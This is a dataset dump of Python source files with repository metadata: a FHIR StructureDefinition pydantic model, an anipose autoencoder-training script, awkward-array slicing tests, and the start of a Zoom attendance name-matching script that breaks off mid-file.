blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3dd51cde5fdbdc6321338ce9a565bb6b23112c26 | 30109f5f173f4e51a20cfcaf6ec41628b177f553 | /fhir/resources/structuredefinition.py | 56118989c2386d775da26b02b7cf0d5bf1a7f79c | [
"BSD-3-Clause"
] | permissive | arkhn/fhir.resources | 82c8f705c8f19e15621f2bb59fd17600c0ef3697 | 122e89c8599c4034bb3075b31d1a1188e377db91 | refs/heads/master | 2022-12-16T07:58:19.448071 | 2020-08-13T03:59:37 | 2020-08-13T03:59:37 | 288,683,730 | 1 | 0 | NOASSERTION | 2020-08-19T09:01:02 | 2020-08-19T09:01:01 | null | UTF-8 | Python | false | false | 23,609 | py | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/StructureDefinition
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from typing import List as ListType
from typing import Union
from pydantic import Field
from . import backboneelement, domainresource, fhirtypes
class StructureDefinition(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Structural Definition.
A definition of a FHIR structure. This resource is used to describe the
underlying resources, data types defined in FHIR, and also for describing
extensions and constraints on resources and data types.
"""
resource_type = Field("StructureDefinition", const=True)
abstract: bool = Field(
...,
alias="abstract",
title="Whether the structure is abstract",
description=(
"Whether structure this definition describes is abstract or not - that"
" is, whether the structure is not intended to be instantiated. For "
"Resources and Data types, abstract types will never be exchanged "
"between systems."
),
# if property is element of this resource.
element_property=True,
)
abstract__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_abstract", title="Extension field for ``abstract``."
)
baseDefinition: fhirtypes.Canonical = Field(
None,
alias="baseDefinition",
title="Definition that this type is constrained/specialized from",
description=(
"An absolute URI that is the base structure from which this type is "
"derived, either by specialization or constraint."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["StructureDefinition"],
)
baseDefinition__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_baseDefinition", title="Extension field for ``baseDefinition``."
)
contact: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
context: ListType[fhirtypes.StructureDefinitionContextType] = Field(
None,
alias="context",
title="If an extension, where it can be used in instances",
description=(
"Identifies the types of resource or data type elements to which the "
"extension can be applied."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant: ListType[fhirtypes.String] = Field(
None,
alias="contextInvariant",
title="FHIRPath invariants - when the extension can be used",
description=(
"A set of rules as FHIRPath Invariants about when the extension can be "
"used (e.g. co-occurrence variants for the extension). All the rules "
"must be true."
),
# if property is element of this resource.
element_property=True,
)
contextInvariant__ext: ListType[
Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(
None,
alias="_contextInvariant",
title="Extension field for ``contextInvariant``.",
)
copyright: fhirtypes.Markdown = Field(
None,
alias="copyright",
title="Use and/or publishing restrictions",
description=(
"A copyright statement relating to the structure definition and/or its "
"contents. Copyright statements are generally legal restrictions on the"
" use and publishing of the structure definition."
),
# if property is element of this resource.
element_property=True,
)
copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_copyright", title="Extension field for ``copyright``."
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the structure definition was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the structure definition "
"changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
derivation: fhirtypes.Code = Field(
None,
alias="derivation",
title="specialization | constraint - How relates to base definition",
description="How the type relates to the baseDefinition.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["specialization", "constraint"],
)
derivation__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_derivation", title="Extension field for ``derivation``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the structure definition",
description=(
"A free text natural language description of the structure definition "
"from a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
differential: fhirtypes.StructureDefinitionDifferentialType = Field(
None,
alias="differential",
title="Differential view of the structure",
description=(
"A differential view is expressed relative to the base "
"StructureDefinition - a statement of differences that it applies."
),
# if property is element of this resource.
element_property=True,
)
experimental: bool = Field(
None,
alias="experimental",
title="For testing purposes, not real usage",
description=(
"A Boolean value to indicate that this structure definition is authored"
" for testing purposes (or education/evaluation/marketing) and is not "
"intended to be used for genuine usage."
),
# if property is element of this resource.
element_property=True,
)
experimental__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_experimental", title="Extension field for ``experimental``."
)
fhirVersion: fhirtypes.Code = Field(
None,
alias="fhirVersion",
title="FHIR Version this StructureDefinition targets",
description=(
"The version of the FHIR specification on which this "
"StructureDefinition is based - this is the formal version of the "
"specification, without the revision number, e.g. "
"[publication].[major].[minor], which is 4.0.1. for this version."
),
# if property is element of this resource.
element_property=True,
)
fhirVersion__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_fhirVersion", title="Extension field for ``fhirVersion``."
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the structure definition",
description=(
"A formal identifier that is used to identify this structure definition"
" when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
jurisdiction: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="jurisdiction",
title="Intended jurisdiction for structure definition (if applicable)",
description=(
"A legal or geographic region in which the structure definition is "
"intended to be used."
),
# if property is element of this resource.
element_property=True,
)
keyword: ListType[fhirtypes.CodingType] = Field(
None,
alias="keyword",
title="Assist with indexing and finding",
description=(
"A set of key words or terms from external terminologies that may be "
"used to assist with indexing and searching of templates nby describing"
" the use of this structure definition, or the content it describes."
),
# if property is element of this resource.
element_property=True,
)
kind: fhirtypes.Code = Field(
...,
alias="kind",
title="primitive-type | complex-type | resource | logical",
description="Defines the kind of structure that this definition is describing.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["primitive-type", "complex-type", "resource", "logical"],
)
kind__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_kind", title="Extension field for ``kind``."
)
mapping: ListType[fhirtypes.StructureDefinitionMappingType] = Field(
None,
alias="mapping",
title="External specification that the content is mapped to",
description="An external specification that the content is mapped to.",
# if property is element of this resource.
element_property=True,
)
name: fhirtypes.String = Field(
...,
alias="name",
title="Name for this structure definition (computer friendly)",
description=(
"A natural language name identifying the structure definition. This "
"name should be usable as an identifier for the module by machine "
"processing applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the "
"structure definition."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
purpose: fhirtypes.Markdown = Field(
None,
alias="purpose",
title="Why this structure definition is defined",
description=(
"Explanation of why this structure definition is needed and why it has "
"been designed as it has."
),
# if property is element of this resource.
element_property=True,
)
purpose__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_purpose", title="Extension field for ``purpose``."
)
snapshot: fhirtypes.StructureDefinitionSnapshotType = Field(
None,
alias="snapshot",
title="Snapshot view of the structure",
description=(
"A snapshot view is expressed in a standalone form that can be used and"
" interpreted without considering the base StructureDefinition."
),
# if property is element of this resource.
element_property=True,
)
status: fhirtypes.Code = Field(
...,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this structure definition. Enables tracking the life-"
"cycle of the content."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this structure definition (human friendly)",
description=(
"A short, descriptive, user-friendly title for the structure " "definition."
),
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
type: fhirtypes.Uri = Field(
...,
alias="type",
title="Type defined or constrained by this structure",
description=(
"The type this structure describes. If the derivation kind is "
"'specialization' then this is the master definition for a type, and "
"there is always one of these (a data type, an extension, a resource, "
"including abstract ones). Otherwise the structure definition is a "
"constraint on the stated type (and in this case, the type cannot be an"
" abstract type). References are URLs that are relative to "
'http://hl7.org/fhir/StructureDefinition e.g. "string" is a reference '
"to http://hl7.org/fhir/StructureDefinition/string. Absolute URLs are "
"only allowed in logical models."
),
# if property is element of this resource.
element_property=True,
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
url: fhirtypes.Uri = Field(
...,
alias="url",
title=(
"Canonical identifier for this structure definition, represented as a "
"URI (globally unique)"
),
description=(
"An absolute URI that is used to identify this structure definition "
"when it is referenced in a specification, model, design or an "
"instance; also called its canonical identifier. This SHOULD be "
"globally unique and SHOULD be a literal address at which at which an "
"authoritative instance of this structure definition is (or will be) "
"published. This URL can be the target of a canonical reference. It "
"SHALL remain the same when the structure definition is stored on "
"different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate structure definition instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the structure definition",
description=(
"The identifier that is used to identify this version of the structure "
"definition when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the structure "
"definition author and is not expected to be globally unique. For "
"example, it might be a timestamp (e.g. yyyymmdd) if a managed version "
"is not available. There is also no expectation that versions can be "
"placed in a lexicographical sequence."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
class StructureDefinitionContext(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
If an extension, where it can be used in instances.
Identifies the types of resource or data type elements to which the
extension can be applied.
"""
resource_type = Field("StructureDefinitionContext", const=True)
expression: fhirtypes.String = Field(
...,
alias="expression",
title="Where the extension can be used in instances",
description=(
"An expression that defines where an extension can be used in " "resources."
),
# if property is element of this resource.
element_property=True,
)
expression__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_expression", title="Extension field for ``expression``."
)
type: fhirtypes.Code = Field(
...,
alias="type",
title="fhirpath | element | extension",
description=(
"Defines how to interpret the expression that defines what the context "
"of the extension is."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["fhirpath", "element", "extension"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
class StructureDefinitionDifferential(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Differential view of the structure.
A differential view is expressed relative to the base StructureDefinition -
a statement of differences that it applies.
"""
resource_type = Field("StructureDefinitionDifferential", const=True)
element: ListType[fhirtypes.ElementDefinitionType] = Field(
...,
alias="element",
title="Definition of elements in the resource (if no StructureDefinition)",
description="Captures constraints on each element within the resource.",
# if property is element of this resource.
element_property=True,
)
class StructureDefinitionMapping(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
External specification that the content is mapped to.
An external specification that the content is mapped to.
"""
resource_type = Field("StructureDefinitionMapping", const=True)
comment: fhirtypes.String = Field(
None,
alias="comment",
title="Versions, Issues, Scope limitations etc.",
description=(
"Comments about this mapping, including version notes, issues, scope "
"limitations, and other important notes for usage."
),
# if property is element of this resource.
element_property=True,
)
comment__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_comment", title="Extension field for ``comment``."
)
identity: fhirtypes.Id = Field(
...,
alias="identity",
title="Internal id when this mapping is used",
description=(
"An Internal id that is used to identify this mapping set when specific"
" mappings are made."
),
# if property is element of this resource.
element_property=True,
)
identity__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_identity", title="Extension field for ``identity``."
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Names what this mapping refers to",
description="A name for the specification that is being mapped to.",
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
uri: fhirtypes.Uri = Field(
None,
alias="uri",
title="Identifies what this mapping refers to",
description=(
"An absolute URI that identifies the specification that this mapping is"
" expressed to."
),
# if property is element of this resource.
element_property=True,
)
uri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_uri", title="Extension field for ``uri``."
)
class StructureDefinitionSnapshot(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Snapshot view of the structure.
A snapshot view is expressed in a standalone form that can be used and
interpreted without considering the base StructureDefinition.
"""
resource_type = Field("StructureDefinitionSnapshot", const=True)
element: ListType[fhirtypes.ElementDefinitionType] = Field(
...,
alias="element",
title="Definition of elements in the resource (if no StructureDefinition)",
description="Captures constraints on each element within the resource.",
# if property is element of this resource.
element_property=True,
)
| [
"connect2nazrul@gmail.com"
] | connect2nazrul@gmail.com |
5a70b3dd55fd3d9c45bbbf134b407923549c6c38 | 50edd95cf9ea295b4216e10361a3dfc7e029a660 | /anipose/train_autoencoder.py | e5534bcc6a314c1726f5d863fc601e59da0b5da8 | [
"BSD-2-Clause"
] | permissive | goyallon/anipose | 5fc03b66b5a362d8ea151c6df4cc6049bccabb15 | 2239cd04f1e6d1f21ff62aab005ebfe6fed351c8 | refs/heads/master | 2022-11-05T06:59:14.077907 | 2020-06-15T23:39:10 | 2020-06-15T23:39:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | py | #!/usr/bin/env python3
from sklearn.neural_network import MLPRegressor, MLPClassifier
import pandas as pd
import os.path
import numpy as np
from glob import glob
from ruamel.yaml import YAML
import pickle
def get_dataset_location(model_folder):
config_fname = os.path.join(model_folder, 'config.yaml')
yaml = YAML(typ='rt')
with open(config_fname, 'r') as f:
dlc_config = yaml.load(f)
iternum = dlc_config['iteration']
fname_pat = os.path.join(
model_folder, 'training-datasets', 'iteration-'+str(iternum),
'*', 'CollectedData_*.h5')
fname = glob(fname_pat)[0]
return fname
def load_pose_2d_training(fname):
data_orig = pd.read_hdf(fname)
scorer = data_orig.columns.levels[0][0]
data = data_orig.loc[:, scorer]
bp_index = data.columns.names.index('bodyparts')
coord_index = data.columns.names.index('coords')
bodyparts = list(data.columns.get_level_values(bp_index).unique())
n_frames = len(data)
n_joints = len(bodyparts)
test = np.array(data).reshape(n_frames, n_joints, 2)
bad = np.any(~np.isfinite(test), axis=2)
test[bad] = np.nan
metadata = {
'bodyparts': bodyparts,
'scorer': scorer,
'index': data.index
}
return test, metadata
def generate_training_data(scores, n_iters=10):
Xs = []
ys = []
for i in range(n_iters):
scores_perturb = scores.copy()
good = scores_perturb == 1
scores_perturb[good] = np.random.normal(1, 0.3, size=np.sum(good))
scores_perturb[~good] = np.random.normal(0, 0.3, size=np.sum(~good))
flipped = np.random.uniform(size=good.shape) < 0.05
scores_perturb = np.clip(scores_perturb, 0, 1)
scores_perturb[flipped] = 1 - scores_perturb[flipped]
Xs.append(scores_perturb)
ys.append(scores)
X = np.vstack(Xs)
y = np.vstack(ys)
return X, y
def train_mlp_classifier(X, y):
hidden = X.shape[1]
mlp = MLPClassifier(hidden_layer_sizes=(hidden),
verbose=2, max_iter=2000,
activation='tanh',
learning_rate='adaptive', solver='adam',
early_stopping=True)
mlp.fit(X, y)
return mlp
def save_mlp_classifier(mlp, fname):
with open(fname, 'wb') as f:
pickle.dump(mlp, f)
print('autoencoder saved at:\n {}'.format(fname))
def train_autoencoder(config):
model_folder = config['model_folder']
data_fname = get_dataset_location(model_folder)
data, metadata = load_pose_2d_training(data_fname)
n_frames, n_joints, _ = data.shape
scores = np.ones((n_frames, n_joints), dtype='float64')
bad = np.any(~np.isfinite(data), axis=2)
scores[bad] = 0
X, y = generate_training_data(scores)
mlp = train_mlp_classifier(X, y)
out_fname = os.path.join(config['path'], 'autoencoder.pickle')
save_mlp_classifier(mlp, out_fname)
# model_folder = '/jellyfish/research/tuthill/hand-demo-dlc-TuthillLab-2019-08-05'
# config = {'model_folder': model_folder, 'path': model_folder}
# train_autoencoder(config)
# get dataset from deeplabcut folder
# generate augmented dataset to train autoencoder
# train MLP classifier
# save result
| [
"krchtchk@gmail.com"
] | krchtchk@gmail.com |
30e78d2b6cb33880f8469deab8d18521ad8705d3 | ef76f8bcea6cc5331b4c8873704426f1aacfd60d | /tests/test_likenumpy.py | 33b1e97bd9a7e2c4fce6a68e09a09b1832715d35 | [
"BSD-3-Clause"
] | permissive | DumbMachine/awkward-array | 10a51c8ac471839e435bb471f45b6624c4f982cb | 8f54cc5d4de3bc56628676243bfe63c683667f16 | refs/heads/master | 2020-04-15T17:43:42.684480 | 2019-01-18T18:39:46 | 2019-01-18T18:39:46 | 164,884,686 | 1 | 0 | BSD-3-Clause | 2019-01-18T18:33:23 | 2019-01-09T15:06:24 | Python | UTF-8 | Python | false | false | 6,027 | py | #!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import numpy
import awkward
class Test(unittest.TestCase):
def runTest(self):
pass
def test_likenumpy_slices(self):
print()
np = numpy.array([[1, 10, 100], [2, 20, 200], [3, 30, 300]])
aw = awkward.fromiter(np)
assert np.tolist() == aw.tolist()
assert np[:2].tolist() == aw[:2].tolist()
assert np[:2, :2].tolist() == aw[:2, :2].tolist()
assert np[:2, 2].tolist() == aw[:2, 2].tolist()
assert np[2, :2].tolist() == aw[2, :2].tolist()
assert np[:2, [0, 1]].tolist() == aw[:2, [0, 1]].tolist()
assert np[[0, 1], :2].tolist() == aw[[0, 1], :2].tolist()
assert np[:2, [0, 1, 2]].tolist() == aw[:2, [0, 1, 2]].tolist()
assert np[[0, 1, 2], :2].tolist() == aw[[0, 1, 2], :2].tolist()
assert np[[0, 1], [0, 1]].tolist() == aw[[0, 1], [0, 1]].tolist()
assert np[[0, 1, 2], [0, 1, 2]].tolist() == aw[[0, 1, 2], [0, 1, 2]].tolist()
assert np[:2, [True, False, True]].tolist() == aw[:2, [True, False, True]].tolist()
assert np[[True, False, True], :2].tolist() == aw[[True, False, True], :2].tolist()
assert np[[True, False, True], [True, False, True]].tolist() == aw[[True, False, True], [True, False, True]].tolist()
np = numpy.array([[[1, 10, 100], [2, 20, 200], [3, 30, 300]], [[4, 40, 400], [5, 50, 500], [6, 60, 600]], [[7, 70, 700], [8, 80, 800], [9, 90, 900]]])
aw = awkward.fromiter(np)
assert np.tolist() == aw.tolist()
assert np[:2].tolist() == aw[:2].tolist()
assert np[:2, :2].tolist() == aw[:2, :2].tolist()
assert np[:2, 2].tolist() == aw[:2, 2].tolist()
assert np[2, :2].tolist() == aw[2, :2].tolist()
assert np[:2, [0, 1]].tolist() == aw[:2, [0, 1]].tolist()
assert np[[0, 1], :2].tolist() == aw[[0, 1], :2].tolist()
assert np[:2, [0, 1, 2]].tolist() == aw[:2, [0, 1, 2]].tolist()
assert np[[0, 1, 2], :2].tolist() == aw[[0, 1, 2], :2].tolist()
assert np[[0, 1], [0, 1]].tolist() == aw[[0, 1], [0, 1]].tolist()
assert np[[0, 1, 2], [0, 1, 2]].tolist() == aw[[0, 1, 2], [0, 1, 2]].tolist()
assert np[:2, [True, False, True]].tolist() == aw[:2, [True, False, True]].tolist()
assert np[[True, False, True], :2].tolist() == aw[[True, False, True], :2].tolist()
assert np[[True, False, True], [True, False, True]].tolist() == aw[[True, False, True], [True, False, True]].tolist()
assert np[:2, :2, 0].tolist() == aw[:2, :2, 0].tolist()
assert np[:2, 2, 0].tolist() == aw[:2, 2, 0].tolist()
assert np[2, :2, 0].tolist() == aw[2, :2, 0].tolist()
assert np[:2, [0, 1], 0].tolist() == aw[:2, [0, 1], 0].tolist()
assert np[[0, 1], :2, 0].tolist() == aw[[0, 1], :2, 0].tolist()
assert np[:2, [0, 1, 2], 0].tolist() == aw[:2, [0, 1, 2], 0].tolist()
assert np[[0, 1, 2], :2, 0].tolist() == aw[[0, 1, 2], :2, 0].tolist()
assert np[[0, 1], [0, 1], 0].tolist() == aw[[0, 1], [0, 1], 0].tolist()
assert np[[0, 1, 2], [0, 1, 2], 0].tolist() == aw[[0, 1, 2], [0, 1, 2], 0].tolist()
assert np[:2, [True, False, True], 0].tolist() == aw[:2, [True, False, True], 0].tolist()
assert np[[True, False, True], :2, 0].tolist() == aw[[True, False, True], :2, 0].tolist()
assert np[[True, False, True], [True, False, True], 0].tolist() == aw[[True, False, True], [True, False, True], 0].tolist()
assert np[:2, :2, 1].tolist() == aw[:2, :2, 1].tolist()
assert np[:2, 2, 1].tolist() == aw[:2, 2, 1].tolist()
assert np[2, :2, 1].tolist() == aw[2, :2, 1].tolist()
assert np[:2, [0, 1], 1].tolist() == aw[:2, [0, 1], 1].tolist()
assert np[[0, 1], :2, 1].tolist() == aw[[0, 1], :2, 1].tolist()
assert np[:2, [0, 1, 2], 1].tolist() == aw[:2, [0, 1, 2], 1].tolist()
assert np[[0, 1, 2], :2, 1].tolist() == aw[[0, 1, 2], :2, 1].tolist()
assert np[[0, 1], [0, 1], 1].tolist() == aw[[0, 1], [0, 1], 1].tolist()
assert np[[0, 1, 2], [0, 1, 2], 1].tolist() == aw[[0, 1, 2], [0, 1, 2], 1].tolist()
assert np[:2, [True, False, True], 1].tolist() == aw[:2, [True, False, True], 1].tolist()
assert np[[True, False, True], :2, 1].tolist() == aw[[True, False, True], :2, 1].tolist()
assert np[[True, False, True], [True, False, True], 1].tolist() == aw[[True, False, True], [True, False, True], 1].tolist()
| [
"jpivarski@gmail.com"
] | jpivarski@gmail.com |
d63c6983f2dcdf576ef3ebfafdf14196ef632044 | c64269774427d81b474b923839c0ed24a8ac38f1 | /zoomident.py | d46f2d4485be6163432d1a911b8fb0b80d66ca34 | [
"LicenseRef-scancode-public-domain"
] | permissive | euske/python3-toys | ba6be94c61e75473426909d0a23d65b9eb54bf2a | 9945f22167e580f6e3ba1dc4a1513d25f2e6bafa | refs/heads/master | 2023-04-01T04:55:20.477855 | 2023-03-27T02:54:28 | 2023-03-27T02:54:28 | 45,541,191 | 8 | 7 | null | null | null | null | UTF-8 | Python | false | false | 20,046 | py | #!/usr/bin/env python
##
## Usage:
## $ ./zoomident.py -i meibo.csv -i extra.txt -p10:10 report.csv
##
## report.csv:
## 祐介 新山,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 新山 (祐),,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## 99B99999 新山祐介,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## シンヤマユウスケ,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
## Yusuke Shinyama,,2022/01/01 12:34:56,2022/01/01 12:35:00,1,Yes
##
## meibo.csv:
## CS2,Dept,99B99999,新山 祐介,シンヤマ ユウスケ,,,2001/1/1,,,yusuke@example.com
##
## extra.txt:
## 99B99999 新山 祐介 しんやま
##
import sys
import csv
from datetime import datetime, time
## Mora
##
class Mora:
def __init__(self, mid, zenk, hank, zenh, *rules):
self.mid = mid
self.zenk = zenk
self.hank = hank
self.zenh = zenh
self.roff = []
self.reng = []
for rule in rules:
if rule.startswith('!'):
self.roff.append(rule[1:])
elif rule.startswith('+'):
self.reng.append(rule[1:])
else:
self.roff.append(rule)
self.reng.append(rule)
#assert self.roff, rules
#assert self.reng, rules
return
def __repr__(self):
return '<%s>' % self.mid
def __str__(self):
return self.zenk
## Mora Table
##
class MoraTable:
@classmethod
def get(klass, k):
return klass.KEY2MORA.get(k, k)
MORA_NN = Mora(
'.n', 'ン', '\uff9d', 'ん', "n'", '+n',
'n:k', 'n:s', 'n:t', 'n:c', 'n:h', 'n:m', 'n:r', 'n:w',
'n:g', 'n:z', 'n:d', 'n:j', 'n:b', 'n:f', 'n:p', 'm:p',
'n:q', 'n:v', 'n:x', 'n:l')
ALL = (
# (symbol, zenkaku_kana, hankaku_kana, zenkaku_hira, output, input)
MORA_NN,
Mora('.a', 'ア', '\uff71', 'あ', 'a'),
Mora('.i', 'イ', '\uff72', 'い', 'i', '+y'),
Mora('.u', 'ウ', '\uff73', 'う', 'u', 'wu', '+w'),
Mora('.e', 'エ', '\uff74', 'え', 'e'),
Mora('.o', 'オ', '\uff75', 'お', 'o'),
Mora('ka', 'カ', '\uff76', 'か', 'ka', '+ca'),
Mora('ki', 'キ', '\uff77', 'き', 'ki', '+ky'),
Mora('ku', 'ク', '\uff78', 'く', 'ku', '+k', '+c', '+q'),
Mora('ke', 'ケ', '\uff79', 'け', 'ke'),
Mora('ko', 'コ', '\uff7a', 'こ', 'ko'),
Mora('sa', 'サ', '\uff7b', 'さ', 'sa'),
Mora('si', 'シ', '\uff7c', 'し', '!si', 'shi', '+si', '+sy'),
Mora('su', 'ス', '\uff7d', 'す', 'su', '+s'),
Mora('se', 'セ', '\uff7e', 'せ', 'se'),
Mora('so', 'ソ', '\uff7f', 'そ', 'so'),
Mora('ta', 'タ', '\uff80', 'た', 'ta'),
Mora('ti', 'チ', '\uff81', 'ち', '!ti', 'chi', 'ci', '+ch'),
Mora('tu', 'ツ', '\uff82', 'つ', '!tu', 'tsu'),
Mora('te', 'テ', '\uff83', 'て', 'te'),
Mora('to', 'ト', '\uff84', 'と', 'to', '+t'),
Mora('na', 'ナ', '\uff85', 'な', 'na'),
